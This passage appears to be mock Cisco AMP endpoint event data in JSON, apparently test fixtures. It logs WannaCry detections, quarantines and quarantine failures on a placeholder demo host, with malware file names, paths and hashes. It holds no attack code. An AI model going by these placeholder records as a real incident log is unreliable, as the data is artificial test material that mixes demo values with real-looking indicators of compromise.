Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 